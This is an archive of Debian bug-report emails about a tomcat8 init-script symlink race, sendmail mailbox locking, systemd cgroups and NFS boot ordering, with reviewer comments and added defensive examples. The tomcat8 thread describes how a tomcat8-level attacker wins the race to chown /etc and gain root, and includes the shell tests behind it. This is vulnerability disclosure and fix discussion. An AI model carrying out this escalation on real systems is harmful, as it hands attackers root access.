---
>   su smmsp -s /bin/bash -c "touch $STAMP_DIR/reload";
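Review bot: the drop to smmsp in this hunk removes the escalation because a symlink that smmsp planted in the group-writable stampdir can then only lead to places smmsp could already create files in, but it also changes who owns $STAMP_DIR/reload: a root-owned reload file left over from the previous version makes the smmsp touch fail with EPERM, so the one-time chown mentioned in the follow-up message (or removing the stale stamp on upgrade) is part of the fix, not optional. Note also that $STAMP_DIR is expanded by root's shell into the -c string and parsed a second time by the smmsp shell; that is acceptable only while SENDMAIL_ROOT stays a fixed path without spaces or shell metacharacters, and runuser(1) from util-linux, where the target release has it, would pass the path as an argument without a second parse and without su's PAM session setup on every queue run. The same comments apply to the identical hunk at line 367.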
367c367
<   touch $STAMP_DIR/reload;
---
>   su smmsp -s /bin/bash -c "touch $STAMP_DIR/reload";
900c900
<   touch $STAMP_DIR/cron_msp;
---
>   su smmsp -s /bin/bash -c "touch 
> $STAMP_DIR/cron_msp";
912c912
<   touch $STAMP_DIR/cron_mta;
---
>   su smmsp -s /bin/bash -c "touch $STAMP_DIR/cron_mta";
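Review bot: in this hunk cron_mta, the stamp for the MTA queue run that the cron line invokes as root, is now written as smmsp as well; if the stamps are used only as timestamps, as the directory name suggests, that is harmless, but an existing root-owned cron_mta makes the touch fail in the same way as reload. If the stamps are migrated at upgrade, do it with chown -h or by deleting and recreating them, because a plain chown on a name inside the group-writable directory follows a symlink and reintroduces the hole this patch closes. The cleaner structure is a stampdir that is root:root 0755 with the MSP's own stamp kept in a separate smmsp-owned directory, so that no root process ever creates a file in a directory smmsp can write.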
938c938
<   touch $STAMP_DIR/cron_msp;
---
>   su smmsp -s /bin/bash -c "touch 
> $STAMP_DIR/cron_msp";


Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



Bug#840685: TOCTOU race condition in initscript on chown'ing JVM_TMP temporary directory (was: Re: Bug#840685: tomcat8: DSA-3670 incomplete)

2016-10-14 Thread paul . szabo
Dear Salvatore,

> You are operating here outside of /tmp (sticky world-writable
> directory) which the above issue for the init scripts relies on,
> right?  fs.protected_(hardlinks|symlinks) is exactly a hardening for
> those issues:
> https://www.kernel.org/doc/Documentation/sysctl/fs.txt

I see: the kernel now treats things in /tmp (with sticky bit
permissions) differently from other places (without "weird"
permissions). Thanks for pointing this out for me!
(I never noticed this change...)

Then I agree that this issue is not exploitable in default Debian,
no need for DSA. (Sorry about the noise.)

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



Bug#840685: tomcat8: DSA-3670 incomplete

2016-10-14 Thread paul . szabo
Dear Markus,

Sorry to reply again.

> ... But there is another rm -rf "$JVM_TMP" command in the stop target
> that would remove your symlink again.

I now see what you mean. There is an rm when you "stop" tomcat, and
another in the "start"; so maybe there are two in restart. No matter:
I watch (with inotify), keep watch and keep watching, and put in a
symlink to /etc soon as I can, anytime and every time I can. So I will
create a symlink after the rm during stop, a wasted thing, present
between your stop and start; then during start you rm, I create the
symlink, you do the useless "mkdir -p" and you chown; I win.

For your test, you took the rm out of your script: you should see /etc
being chowned to tomcat8. Please confirm.

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



Bug#840685: tomcat8: DSA-3670 incomplete

2016-10-14 Thread paul . szabo
Dear Markus,

> First of all you can only gain write permissions as the tomcat8 user if
> you exploit an yet unknown security vulnerability in a web application
> or Tomcat itself. Debian's tomcat8 user has no shell access by default.

Yes, this is a privilege escalation issue: exactly as in DSA-3670.

> So the server must be running ...

No, you are wrong. Once I managed run-any-code-as-tomcat8 from the
running server, I set up something to run in the background, to keep
running after the server exited.

> ... and somehow you managed to remove /tmp/tomcat8-tomcat8-tmp and
> replaced the directory with a symlink to an arbitrary file.

No I do not remove anything. You do the remove, I create the symlink
after you removed (and before you attempt the mkdir).

> Your attack vector requires that the server must be restarted. ...

Yes, exactly as in DSA-3670.

> ... But there is another rm -rf "$JVM_TMP" command in the stop target
> that would remove your symlink again.

No, not another rm. I create the symlink after your rm.

> Ok, let's imagine that you could find a way around the rm -rf commands.
> Let's remove those rm -rf "$JVM_TMP" calls in /etc/init.d/tomcat8. Then
> run systemctl daemon-reload. Log in as tomcat8 user and create your
> symlink for /tmp/tomcat8-tomcat8-tmp. If I run systemctl restart tomcat8
> now, I get this:
> 
> Job for tomcat8.service failed because the control process exited with
> error code.
> 
> The symlink is still present and nothing has changed regarding the file
> permissions for my arbitrary file.

You created the wrong symlink: not to a random place and not to a file,
but a symlink to /etc (an existing directory). Please try again.

> I agree that we should improve the init script in this regard but I
> actually don't see a major risk like a root escalation for users at the
> moment and I suggest to lower the severity of this bug report to important.

Do the right test, please. You will see /etc owned by tomcat8, that
effectively gives root access.

>> What response time should I have expected of team@security? You had
>> close to a whole day...
> In my opinion it is generally understood that you should give people at
> least enough time to react to an e-mail and to assess the issue.
> Expecting a response time in less than a day is not very reasonable,
> especially when there are things like the time difference between
> Australia and Europe.

You can do better, if you try.

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



Bug#840685: tomcat8: DSA-3670 incomplete

2016-10-14 Thread paul . szabo
Dear Salvatore,

> ... if the attacker created a symlink between the rm and the mkdir
> then mkdir will still fail with -p on a symlink.  (Or do I miss
> something?). ...

Yes, you missed a simple test:

$ mkdir mydir
$ ln -s mydir mylink
$ ls -ld my*
drwx------ 2 psz amstaff 4096 Oct 14 18:46 mydir
lrwxrwxrwx 1 psz amstaff    5 Oct 14 18:46 mylink -> mydir
$ mkdir -p mylink || echo failed
$ mkdir -p mylink; echo $?
0
$ mkdir mylink || echo failed
mkdir: cannot create directory `mylink': File exists
failed
$ mkdir mylink; echo $?
mkdir: cannot create directory `mylink': File exists
1
$ ls -ld my*
drwx------ 2 psz amstaff 4096 Oct 14 18:46 mydir
lrwxrwxrwx 1 psz amstaff    5 Oct 14 18:46 mylink -> mydir
$ 

showing that "mkdir -p" does not fail (but plain mkdir does).

> On the practicality for Debian systems though this is mitigated by the
> Kernel hardenings which are enabled by default:
> 
> fs.protected_hardlinks=1
> fs.protected_symlink=1
> 
> which will prevent that the target of the symlink in /tmp will be
> changed on the chown call.

Another missing test (besides: who is changing anything?):

# grep . /proc/sys/fs/prot*
/proc/sys/fs/protected_hardlinks:1
/proc/sys/fs/protected_symlinks:1
# cd ~psz
# ls -ld my*
drwx------ 2 psz amstaff 4096 Oct 14 18:46 mydir
lrwxrwxrwx 1 psz amstaff    5 Oct 14 18:46 mylink -> mydir
# chown mike mylink
# ls -ld my*
drwx------ 2 mike amstaff 4096 Oct 14 18:46 mydir
lrwxrwxrwx 1 psz  amstaff    5 Oct 14 18:46 mylink -> mydir
# 

> So while I think it should be fixed, this would not warrant a DSA,
> since mitigated by default in Debian.

No mitigation: fix and DSA, please!

---

What response time should I have expected of team@security? You had
close to a whole day... compared to that, Markus replied within the
hour to the Debian bug. (But he did not yet reply to my next, private
bug/message... seems public messaging works best!)

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



Bug#840685: tomcat8: DSA-3670 incomplete

2016-10-13 Thread paul . szabo
Dear Markus,

>> [ I contacted t...@security.debian.org about this, but no response ... ]
> ... Please send them to the security team
> first and not to a public mailing list.

I did. They did not reply within what seemed a reasonable timeframe.

>> Recently DSA-3670 was released, and /etc/init.d/tomcat8 modified so...
> No, we did not modify this part in /etc/init.d/tomcat8. ...

Whoops, sorry, you are right. Now checking, I do not see how I got
confused. This is a separate, maybe new issue.

> ... more information and a working proof
> of concept code are appreciated. ...

Maybe the security team will understand (recognize, accept) the issue
without a PoC. If they reply with such a need, then I will write one.

You or they might accept the suggested patch/fix: mkdir without -p,
chown with -h.

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



Bug#840685: tomcat8: DSA-3670 incomplete

2016-10-13 Thread Paul Szabo
Package: tomcat8
Version: 8.0.14-1+deb8u3
Severity: critical
Tags: security
Justification: root security hole


[ I contacted t...@security.debian.org about this, but no response ... ]

Recently DSA-3670 was released, and /etc/init.d/tomcat8 modified so:

...
NAME=tomcat8
...
JVM_TMP=/tmp/tomcat8-$NAME-tmp
...
# Remove / recreate JVM_TMP directory
rm -rf "$JVM_TMP"
mkdir -p "$JVM_TMP" || {
    log_failure_msg "could not create JVM temporary directory"
    exit 1
}
chown $TOMCAT8_USER "$JVM_TMP"
...

That suffers from a TOCTOU race condition.

An attacker can, after the "rm -rf", create a symlink to /etc. Then
"mkdir -p" returns success (though does nothing); and chown follows
the symlink. That is "game over": ability to replace /etc/passwd.

The attacker can use inotify and act quickly, and have a good chance
of winning the race to create the symlink before the init.d script
starts a new mkdir process.

Do you need some working PoC code?

---

The script should be made more robust by using "chown -h". (This would
protect against the above attack.)

The script should use plain mkdir without "-p": not needed as we create
a single directory, and should not be used to let mkdir return failure.
(This may make it safe.)

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



-- System Information:
Debian Release: 8.6
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: i386 (x86_64)

Kernel: Linux 3.16.36-pk07.24-amd64 (SMP w/2 CPU cores)
Locale: LANG=C.UTF-8, LC_CTYPE=C.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash
Init: systemd (via /run/systemd/system)

Versions of packages tomcat8 depends on:
ii  adduser                3.113+nmu3
ii  debconf [debconf-2.0]  1.5.56
ii  tomcat8-common         8.0.14-1+deb8u3
ii  ucf                    3.0030

Versions of packages tomcat8 recommends:
pn  authbind  

Versions of packages tomcat8 suggests:
pn  libtcnative-1 
pn  tomcat8-admin 
pn  tomcat8-docs  
pn  tomcat8-examples  
pn  tomcat8-user  

-- Configuration Files:
/etc/init.d/tomcat8 changed [not included]
/etc/tomcat8/catalina.properties [Errno 13] Permission denied: u'/etc/tomcat8/catalina.properties'
/etc/tomcat8/context.xml [Errno 13] Permission denied: u'/etc/tomcat8/context.xml'
/etc/tomcat8/logging.properties [Errno 13] Permission denied: u'/etc/tomcat8/logging.properties'
/etc/tomcat8/policy.d/01system.policy [Errno 13] Permission denied: u'/etc/tomcat8/policy.d/01system.policy'
/etc/tomcat8/policy.d/02debian.policy [Errno 13] Permission denied: u'/etc/tomcat8/policy.d/02debian.policy'
/etc/tomcat8/policy.d/03catalina.policy [Errno 13] Permission denied: u'/etc/tomcat8/policy.d/03catalina.policy'
/etc/tomcat8/policy.d/04webapps.policy [Errno 13] Permission denied: u'/etc/tomcat8/policy.d/04webapps.policy'
/etc/tomcat8/policy.d/50local.policy [Errno 13] Permission denied: u'/etc/tomcat8/policy.d/50local.policy'
/etc/tomcat8/server.xml [Errno 13] Permission denied: u'/etc/tomcat8/server.xml'
/etc/tomcat8/tomcat-users.xml [Errno 13] Permission denied: u'/etc/tomcat8/tomcat-users.xml'
/etc/tomcat8/web.xml [Errno 13] Permission denied: u'/etc/tomcat8/web.xml'

-- debconf information excluded
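Added example, not code from the bug report or from the tomcat8 package, covering both the race described in this report and the "mkdir -p" test in the 2016-10-14 reply to Salvatore. It reproduces the scenario at the level of the system calls the shell commands map to: "mkdir -p" tolerates an existing path by stat()ing it (which follows symlinks), plain mkdir is mkdir(2) and fails with EEXIST on anything already at that name, and "chown -h" is lchown(2), which never follows a link. The hardened sequence is the one the report recommends. The scratch paths under /tmp are constructed for the demo and nothing in it needs root.

```c
/* Added example (not from the tomcat8 package): why plain mkdir + chown -h
 * closes the JVM_TMP symlink race that "mkdir -p" + chown leaves open.
 * All paths are constructed in a scratch directory under /tmp. */
#define _GNU_SOURCE
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* What "mkdir -p DIR" does for a single component: create it, or accept
 * it if something directory-like already sits there. stat() follows
 * symlinks, so a symlink that points at a directory is accepted too. */
static int mkdir_p_like(const char *path)
{
    struct stat st;
    if (mkdir(path, 0700) == 0)
        return 0;
    if (errno == EEXIST && stat(path, &st) == 0 && S_ISDIR(st.st_mode))
        return 0;
    return -1;
}

/* Hardened "remove / recreate" step as the report recommends: mkdir(2)
 * must itself create the directory (any pre-existing entry, a planted
 * symlink included, makes it fail), and lchown(2) (chown -h) changes the
 * name itself, never a target. Returns 0 on success, -errno on failure. */
int create_owned_dir(const char *path, uid_t uid, gid_t gid)
{
    if (mkdir(path, 0700) < 0)
        return -errno;
    if (lchown(path, uid, gid) < 0) {
        int e = errno;
        rmdir(path);
        return -e;
    }
    return 0;
}

/* Scenario from the report: between the rm -rf and the mkdir, a symlink
 * named like JVM_TMP appears, pointing at a directory that stands in for
 * /etc. Returns 1 if the loose sequence accepts the symlink while the
 * hardened one refuses it with EEXIST, 0 otherwise. */
int demo_symlink_race(void)
{
    char work[] = "/tmp/jvmtmp-demo-XXXXXX";   /* constructed scratch dir */
    char target[64], jvm_tmp[64];
    int loose, hardened, result;

    if (!mkdtemp(work))
        return 0;
    snprintf(target, sizeof target, "%s/etc-stand-in", work);
    snprintf(jvm_tmp, sizeof jvm_tmp, "%s/tomcat8-tmp", work);
    if (mkdir(target, 0700) < 0 || symlink(target, jvm_tmp) < 0)
        return 0;

    loose = mkdir_p_like(jvm_tmp);                              /* 0: accepted */
    hardened = create_owned_dir(jvm_tmp, getuid(), getgid());   /* -EEXIST */

    result = (loose == 0 && hardened == -EEXIST);

    unlink(jvm_tmp);
    rmdir(target);
    rmdir(work);
    return result;
}

int main(void)
{
    printf("mkdir -p accepts the planted symlink, plain mkdir refuses it: %s\n",
           demo_symlink_race() ? "yes" : "no");
    return 0;
}
```

The chown step is only reached when mkdir created the directory itself, so there is no longer a window in which a symlink can be re-owned; lchown is kept as belt and braces so that even a future "-p" style change cannot turn a symlink into an ownership change of its target.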



Bug#775541: NFS mounts fail at boot after Debian 8.5 upgrade

2016-09-06 Thread paul . szabo
Dear Vincent,

> Could you provide a bit more information about the package versions
> on your system?
> dpkg -l rpcbind nfs-common nfs-kernel-server systemd

psz@como:~$ dpkg -l rpcbind nfs-common nfs-kernel-server systemd
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name               Version            Architecture  Description
+++-==================-==================-=============-=====================================================
ii  nfs-common         1:1.2.8-9          i386          NFS support files common to client and server
ii  nfs-kernel-server  1:1.2.8-9          i386          support for NFS kernel server
ii  rpcbind            0.2.1-6+deb8u1     i386          converts RPC program numbers into universal addresses
ii  systemd            215-17+deb8u4.psz  i386          system and service manager

The systemd packages are my "own", with my (trivial!) patches as per
https://bugs.debian.org/803013

> Also I think the output of these commands would be helpful
> systemd-analyze critical-path remote-fs-pre.target
> systemd-analyze critical-path nfs-kernel-server.service

I think you meant critical-chain:

psz@como:~$ systemd-analyze critical-chain remote-fs-pre.target
...
remote-fs-pre.target @98ms


psz@como:~$ systemd-analyze critical-chain nfs-kernel-server.service
...
nfs-kernel-server.service +223ms
  basic.target @4.819s
timers.target @4.818s
  systemd-tmpfiles-clean.timer @4.818s
sysinit.target @4.816s
  console-setup.service @4.813s +1ms
kbd.service @4.753s +58ms
  system.slice @108ms
-.slice @103ms

Cheers, Paul



Bug#775541: NFS mounts fail at boot after Debian 8.5 upgrade

2016-08-19 Thread paul . szabo
After upgrading from Debian jessie 8.4 to 8.5, my NFS mounts in fstab
failed at boot (or reboot) time. To fix, I changed the one file
  /lib/systemd/system/remote-fs-pre.target
adding the line
  After=rpcbind.target
then my NFS mounts work correctly.

Question: should I have used After=rpcbind.service instead?

Thanks, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia
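The same one-line change, as an added example that is not part of the report, expressed as a systemd drop-in override instead of an edit to the packaged unit file, so that the next systemd package upgrade does not overwrite it (systemd reads /etc/systemd/system/<unit>.d/*.conf on top of the unit shipped in /lib). The file name rpcbind.conf is an assumption; the ordering line is the report's own After=rpcbind.target, and the .service versus .target question is left as asked:

```ini
# /etc/systemd/system/remote-fs-pre.target.d/rpcbind.conf
# Added example (file name assumed): drop-in carrying the report's
# After= line, kept in /etc so package upgrades leave it in place.
[Unit]
After=rpcbind.target
```

Run systemctl daemon-reload after creating the file; systemd-analyze critical-chain remote-fs-pre.target, as used later in this thread, then shows rpcbind in the chain.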



Bug#803013: systemd should not destroy application created cgroups

2015-10-25 Thread Paul Szabo
Package: systemd
Version: 215-17+deb8u2
Severity: critical
Tags: patch
Justification: breaks unrelated software

If you use cgroups, then systemd will on occasions destroy your
settings. To reproduce:
 - Set up cgroups e.g. adding TaskIDs to /sys/fs/cgroup/cpu/DIR/tasks
   files. (I use cgrulesengd from package cgroup-tools, but any other
   use of cgroups is equally affected.)
 - Then when you use systemd commands:
 systemctl daemon-reload
 systemctl start anacron
   you will see your cgroups (your tasks files) becoming empty.
   Command daemon-reload seems to happen within "apt-get dist-upgrade"
   sequences, and "start anacron" happens nightly. (Some other systemd
   commands may also affect.)

I propose the attached patch to avoid the issue. This patch seems to work
well for me.

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia


-- Package-specific info:

-- System Information:
Debian Release: 8.2
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: i386 (x86_64)

Kernel: Linux 3.16.7-ckt11-pk07.12-amd64 (SMP w/8 CPU cores)
Locale: LANG=C.UTF-8, LC_CTYPE=C.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash
Init: systemd (via /run/systemd/system)

Versions of packages systemd depends on:
ii  acl             2.2.52-2
ii  adduser         3.113+nmu3
ii  initscripts     2.88dsf-59
ii  libacl1         2.2.52-2
ii  libaudit1       1:2.4-1+b1
ii  libblkid1       2.25.2-6
ii  libc6           2.19-18+deb8u1
ii  libcap2         1:2.24-8
ii  libcap2-bin     1:2.24-8
ii  libcryptsetup4  2:1.6.6-5
ii  libgcrypt20     1.6.3-2
ii  libkmod2        18-3
ii  liblzma5        5.1.1alpha+20120614-2+b3
ii  libpam0g        1.1.8-3.1
ii  libselinux1     2.3-2
ii  libsystemd0     215-17+deb8u2
ii  mount           2.25.2-6
ii  sysv-rc         2.88dsf-59
ii  udev            215-17+deb8u2
ii  util-linux      2.25.2-6

Versions of packages systemd recommends:
ii  dbus            1.8.20-0+deb8u1
ii  libpam-systemd  215-17+deb8u2

Versions of packages systemd suggests:
pn  systemd-ui  

-- no debconf information
diff -r -U12 a/src/shared/cgroup-util.c b/src/shared/cgroup-util.c
--- a/src/shared/cgroup-util.c	2015-10-25 07:16:24.0 +1100
+++ b/src/shared/cgroup-util.c	2015-10-26 06:03:25.0 +1100
@@ -281,24 +281,34 @@
 
 int cg_migrate(const char *cfrom, const char *pfrom, const char *cto, const char *pto, bool ignore_self) {
 bool done = false;
 _cleanup_set_free_ Set *s = NULL;
 int r, ret = 0;
 pid_t my_pid;
 
 assert(cfrom);
 assert(pfrom);
 assert(cto);
 assert(pto);
 
+/*
+ * PSz 25 Oct 2015
+ * An empty "to" path is surely wrong (do not annoy cgroups that not ours)
+ */
+if (!strlen(pto)) {
+/* log_warning("Debug: cg_migrate skip from (%s)%s to (%s)%s", cfrom, pfrom, cto, pto); */
+return ret;
+}
+/* log_warning("Debug: cg_migrate do from (%s)%s to (%s)%s", cfrom, pfrom, cto, pto); */
+
 s = set_new(trivial_hash_func, trivial_compare_func);
 if (!s)
 return -ENOMEM;
 
 my_pid = getpid();
 
 do {
 _cleanup_fclose_ FILE *f = NULL;
 pid_t pid = 0;
 done = true;
 
 r = cg_enumerate_processes(cfrom, pfrom, &f);
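Review bot: the new early return (`if (!strlen(pto)) { ... return ret; }`) turns an empty destination path into a silent success, since `ret` is still 0 at that point, so a caller that reaches cg_migrate with a wrong `pto` gets no indication that the migration was skipped; returning an error such as -EINVAL, or at least logging at debug level, would make the skip visible instead of hiding a caller bug. The two `log_warning(...)` calls left in as comments and the dated "PSz 25 Oct 2015" banner should be dropped before submission, and `*pto == '\0'` reads more directly than `!strlen(pto)`. The check itself is safe: `assert(pto)` a few lines above already guarantees pto is non-NULL.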


Bug#684645: liblockfile1: Order of fcntl and dotlock in maillock

2012-10-27 Thread paul . szabo
Dear Michael,

I guess that lockmbox() should not be called on entry to deliver(),
but that block moved to after the first flock().

I wonder about the close(mbfd) in line 1370: should unlockmbox() be
called just after, and lockmbox() called again after the re-open and
subsequent flock()?

---

I wonder if I am qualified to provide patches. What has me stumped
is that I do not seem to be able to build sendmail-bin. Trying:

  tar zxf sendmail.8.14.4.tar.gz
  gzcat sendmail_8.14.4-2.1.diff.gz | patch -p0
  cd sendmail-8.14.4
  dpkg-buildpackage -rfakeroot -B -uc -us

elicits some errors:

... 
 fakeroot debian/rules clean
/usr/share/cdbs/1/rules/tarball.mk:33: WARNING:  tarball.mk is deprecated - please use source format 3.0 instead
/bin/sh: line 0: cd: build-tree/sendmail-8.14.4: No such file or directory
...
dh_testroot
rm -f debian/stamp-makefile-build debian/stamp-makefile-install
k distclean
make: k: Command not found
...
cd build-tree/sendmail-8.14.4 && QUILT_PATCHES=/usr/users/amstaff/psz/sendmail-bin/sendmail-8.14.4/debian/patches/8.14/8.14.4 quilt --quiltrc /dev/null push -a || test $? = 2
Applying patch control_c
can't find file to patch at input line 24
...
make: *** [debian/stamp-patched] Error 1
dpkg-buildpackage: error: debian/rules build-arch gave error exit status 2

Can you give me a hint on what I am doing wrong?

Thanks, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org



Bug#648941: /usr/lib/sm.bin/mail.local: Uses flock, not fcntl

2012-08-12 Thread paul . szabo
Dear Tobias,

I submitted  http://bugs.debian.org/684645  against liblockfile1.
But then I realized that liblockfile is fine and that the bug must be
within mail.local sources, so I re-assigned that bug to sendmail-bin.

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia





Bug#684645: /usr/lib/sm.bin/mail.local: Order of fcntl and dotlock in maillock

2012-08-12 Thread paul . szabo
reassign 684645 sendmail-bin 8.14.4-2.1
thanks

Hmm... comparing with an strace of /usr/bin/bsd-mailx, shows that mailx
uses liblockfile and does:
  open("/var/mail/psz", O_RDWR) = 3
  fcntl64(3, F_SETLKW, {type=F_WRLCK, whence=SEEK_CUR, start=0, len=0}) = 0
  link("/var/mail/.lk128035p639", "/var/mail/psz.lock") = 0
in the "right" order. This suggests that liblockfile is fine.

I thus suppose that mail.local only "pretends" to use liblockfile and
maillock(), but that in fact it does its own locking, this bug being
entirely in the sendmail-bin sources. - Such "pretence" was noted
previously, in the initial report of  http://bugs.debian.org/648941 .

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia





Bug#684645: liblockfile1: Order of fcntl and dotlock in maillock

2012-08-12 Thread Paul Szabo
Package: liblockfile1
Version: 1.09-4
Severity: serious
Justification: Policy 11.6

Debian policy
http://www.debian.org/doc/debian-policy/ch-customized-programs.html#s-mail-transport-agents
says:
  ... fcntl() locking must be combined with dot locking.
  To avoid deadlocks, a program should use fcntl() first
  and dot locking after this, or alternatively implement
  the two locking methods in a non blocking way. Using
  the functions maillock and mailunlock provided by the
  liblockfile* packages is the recommended way to
  realize this. 
Looking at an strace of /usr/lib/sm.bin/mail.local it seems to use
/usr/lib/i386-linux-gnu/liblockfile.so.1 and shows:
  link("/var/mail/.lk10336dp639", "/var/mail/psz.lock") = 0
  open("/var/mail/psz", O_WRONLY|O_APPEND) = 4
  fcntl64(4, F_SETLKW, {type=F_WRLCK, whence=SEEK_CUR, start=0, len=0}) = 0
which seems the wrong order.

Please see http://bugs.debian.org/648941 also.

Thanks, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia


-- System Information:
Debian Release: wheezy/sid
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: i386 (i686)

Kernel: Linux 3.2.21-pk06.02-i386 (SMP w/2 CPU cores)
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/bash

Versions of packages liblockfile1 depends on:
ii  libc6              2.13-33
ii  liblockfile-bin    1.09-4
ii  multiarch-support  2.13-33

liblockfile1 recommends no packages.

liblockfile1 suggests no packages.

-- no debconf information





Bug#648941: /usr/lib/sm.bin/mail.local: Uses flock, not fcntl

2012-08-12 Thread paul . szabo
Dear Tobias,

> Well, I don't know. I just saw that "Uses flock, not fcntl" is fixed.

And I guess that was the main issue, leading to file corruption.
Thanks for letting me know.

> You could retitle the bug or create a new one to track the order issue.

I wonder whether that bug is in sendmail-bin or maybe elsewhere.
Assuming the latter, I will now submit a new bug against liblockfile1.

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia





Bug#648941: /usr/lib/sm.bin/mail.local: Uses flock, not fcntl

2012-08-12 Thread paul . szabo
Dear Tobias,

> fixed 648941 8.14.4-2.1
> This is fixed in Wheezy.

Is it, really? The policy says:
  ... fcntl() locking must be combined with dot locking. To avoid
  deadlocks, a program should use fcntl() first and dot locking after
  this ...
whereas strace shows:
  link("/var/mail/.lk10336dp639", "/var/mail/psz.lock") = 0
  open("/var/mail/psz", O_WRONLY|O_APPEND) = 4
  fcntl64(4, F_SETLKW, {type=F_WRLCK, whence=SEEK_CUR, start=0, len=0}) = 0
which seems the wrong order.

Thanks, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia





Bug#648941: /usr/lib/sm.bin/mail.local: Uses flock, not fcntl

2011-11-16 Thread Paul Szabo
Package: sendmail-bin
Version: 8.14.3-9.4
Severity: serious
File: /usr/lib/sm.bin/mail.local
Justification: Policy 11.6


Using strace I see that mail.local uses flock:

  open("/var/mail/psz", O_WRONLY|O_APPEND) = 4
  flock(4, LOCK_EX)   = 0

(as well as a /var/mail/psz.lock file).

This is against Debian policy: looking in
http://www.debian.org/doc/debian-policy/ch-customized-programs.html#s-mail-transport-agents
I see "... fcntl() locking must be ...". Curiously, mail.local accesses
(but does not use?) /usr/lib/liblockfile.so.1 also.

This bug may permit corruption of mail files, and in fact such corruption
has been observed on rare occasions.

Please see  http://bugs.debian.org/513298  also.

Thanks, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia


-- Package-specific info:
Ouput of /usr/share/bug/sendmail-bin/script:

ls -alR /etc/mail:
/etc/mail:
total 106
drwxr-sr-x   7 smmta smmsp  1024 Jul 14 07:01 .
drwxr-xr-x 161 root  root  10240 Nov 16 15:32 ..
-rwxr-xr--   1 root  smmsp  8043 Jul 14 08:15 Makefile
-rw-------   1 root  root   4261 Jul 14 06:42 access
-rw-r-----   1 smmta smmsp  3072 Dec 22  2009 access.db
-rw-r--r--   1 root  smmsp     0 Dec 22  2009 aliases
-rw-r-----   1 smmta smmsp  3072 Jul 14 07:01 aliases.db
-rw-r--r--   1 root  smmsp  2804 Jul 14 08:15 databases
-rw-r--r--   1 root  root   5657 Jul 17  2008 helpfile
-rw-r--r--   1 root  smmsp    33 Dec 22  2009 local-host-names
drwxr-sr-x   2 smmta smmsp  1024 Dec 22  2009 m4
drwxr-xr-x   2 root  root   1024 Jul 14 06:40 peers
drwxr-xr-x   2 root  smmsp  1024 Jul 16  2008 sasl
-rw-r--r--   1 root  smmsp  8591 Jul 14 07:01 sendmail.cf
-rw-r--r--   1 root  root   8591 Jul 14 06:42 sendmail.cf.old
-rw-r--r--   1 root  root  10032 May  6  2002 sendmail.conf
-rw-r--r--   1 root  smmsp    46 Jul 14 07:01 sendmail.mc
drwxr-sr-x   2 smmta smmsp  1024 Dec 22  2009 smrsh
lrwxrwxrwx   1 root  root     15 Dec 23  2009 spamassassin -> ../spamassassin
-rw-r--r--   1 root  smmsp  7947 Jul 14 07:01 submit.cf
-rw-r--r--   1 root  smmsp    55 Jul 14 06:42 submit.cf.errors
-rw-r--r--   1 root  root   7947 Jul 14 06:42 submit.cf.old
-rw-r--r--   1 root  smmsp    59 Jul 14 07:01 submit.mc
drwxr-xr-x   2 smmta smmsp  1024 Dec 22  2009 tls
-rw-r--r--   1 root  smmsp     0 Dec 22  2009 trusted-users

/etc/mail/m4:
total 2
drwxr-sr-x 2 smmta smmsp 1024 Dec 22  2009 .
drwxr-sr-x 7 smmta smmsp 1024 Jul 14 07:01 ..
-rw-r----- 1 root  smmsp    0 Dec 22  2009 dialup.m4
-rw-r----- 1 root  smmsp    0 Dec 22  2009 provider.m4

/etc/mail/peers:
total 2
drwxr-xr-x 2 root  root  1024 Jul 14 06:40 .
